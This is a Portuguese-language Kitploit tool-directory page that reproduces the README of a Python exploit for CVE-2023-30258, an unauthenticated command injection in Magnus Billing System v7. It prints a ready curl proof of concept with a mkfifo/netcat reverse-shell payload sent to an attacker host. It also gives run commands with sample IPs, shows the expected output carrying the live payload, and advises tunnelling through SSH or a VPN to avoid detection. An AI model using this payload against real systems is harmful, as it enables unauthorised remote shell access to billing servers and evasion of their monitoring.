Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-30258-magnus-billing-v7-exploit — Exploit automatizado em Python para CVE-2023-30258, uma injeção de comandos no Magnus Billing System v7. Envia uma requisição GET maliciosa para icepay.php a fim de executar comandos arbitrários e estabelecer um reverse shell. | Kitploit
Ferramentas/GitHubGitHub/tinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubtinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258-magnus-billing-v7-exploit

Exploit automatizado em Python para CVE-2023-30258, uma injeção de comandos no Magnus Billing System v7. Envia uma requisição GET maliciosa para icepay.php a fim de executar comandos arbitrários e estabelecer um reverse shell.

Ver Repositório
712há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit do Magnus Billing System v7

Este script Python automatiza a exploração de uma vulnerabilidade de injeção de comandos no Magnus Billing System v7, especificamente no script icepay.php localizado em /mbilling/lib/icepay/icepay.php. O exploit aproveita o parâmetro democ para executar comandos arbitrários no sistema alvo, estabelecendo, em última análise, um reverse shell para uma máquina controlada pelo atacante.

Visão Geral da Vulnerabilidade

A vulnerabilidade permite injeção de comandos sem autenticação por meio de uma solicitação GET manipulada. O proof-of-concept (PoC) original usava o seguinte comando curl:

curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'

Este script automatiza esse processo, tornando-o configurável por meio de argumentos de linha de comando.

Recursos

  • Configurável: Especifique o IP do alvo, o IP do atacante e a porta por meio de argumentos de linha de comando
  • Simples: Usa a biblioteca requests para enviar a solicitação HTTP com o payload
  • Feedback: Fornece uma saída clara para acompanhar o progresso do exploit

Pré-requisitos

  • Python 3.x: Garanta que o Python 3 esteja instalado no seu sistema
  • Biblioteca Requests: Instale o módulo Python requests:
    pip install requests
    
  • Netcat: O sistema alvo deve ter netcat (nc) instalado para que o reverse shell funcione
  • Listener: Configure um listener netcat na máquina do atacante para capturar o reverse shell
  • Alvo Vulnerável: O alvo deve estar executando o Magnus Billing System v7 com o script vulnerável icepay.php acessível

Uso

Configuração

  1. Clone ou Baixe: Salve o script como exploit.py
  2. Configure o Listener: Na sua máquina atacante, inicie um listener netcat:
    nc -lvnp <PORT>
    
    Substitua <PORT> pela porta escolhida (por exemplo, 443)

Executando o Exploit

python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>

Parâmetros:

  • -t, --target: Endereço IP do sistema Magnus Billing alvo
  • -a, --attacker: Seu endereço IP para receber o reverse shell
  • -p, --port: Porta na sua máquina para o reverse shell

Exemplo

python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443

Saída Esperada:

=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
  1. Capture o Shell: Alterne para o seu listener netcat para interagir com o reverse shell, se for bem-sucedido

Notas Técnicas

  • Tipo de Payload: O script usa um reverse shell baseado em FIFO (mkfifo) com netcat
  • Tratamento de Erros: São incluídas verificações básicas para erros de rede e portas inválidas
  • Depuração: Para inspecionar a resposta do servidor, descomente print(response.text) na função exploit()
  • Payloads Alternativos: O script pode ser modificado para usar diferentes payloads de reverse shell, se necessário

Solução de Problemas

  • Se a conexão falhar, verifique se:
    • O sistema alvo possui netcat instalado
    • Nenhum firewall está bloqueando a conexão
    • As portas corretas estão sendo usadas
    • O alvo não foi atualizado com o patch

Considerações de Segurança

  • Considere usar túnel SSH ou VPN ao utilizar este exploit para evitar detecção
  • O payload pode acionar sistemas de monitoramento de segurança

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança. Use-a somente em sistemas onde você tenha permissão explícita para testar. O uso não autorizado contra sistemas que você não possui ou para os quais não tem consentimento para testar é ilegal e antiético. O autor não é responsável por qualquer uso indevido ou dano causado por este script.

Licença

Este projeto é distribuído sob a Licença MIT. Sinta-se à vontade para modificá-lo e distribuí-lo conforme necessário, mantendo o aviso legal intacto.

Contribuição

Contribuições, relatórios de bugs e solicitações de recursos são bem-vindos. Sinta-se à vontade para enviar um pull request ou abrir uma issue.

Baixar ferramenta